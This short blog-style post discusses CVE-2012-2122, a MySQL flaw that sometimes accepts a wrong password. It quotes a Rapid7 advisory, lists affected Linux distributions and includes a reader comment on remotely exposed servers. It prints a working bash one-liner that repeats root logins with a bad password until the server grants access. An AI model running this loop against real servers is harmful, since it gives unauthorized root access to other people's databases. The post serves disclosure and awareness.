“In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.”
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done mysql>
The following are confirmed distributions that are vulnerable:
- Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 ) ( via many including @michealc )
- OpenSuSE 12.1 64-bit MySQL 5.5.23-log ( via @michealc )
- Debian Unstable 64-bit 5.5.23-2 ( via @derickr )
- Fedora ( via hexed and confirmed by Red Hat )
- Arch Linux (unspecified version)
Full details can be found at https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
Joseph Scott says
Of course to exploit this you’d need to allow remote logins to your MySQL server from outside your network (or find a way to get access to the inside), which would be a bad idea in general.
As you can see from the statistics in the post, there are 100 of thousands of MySQL servers that are accessible most likely to existing poor practices.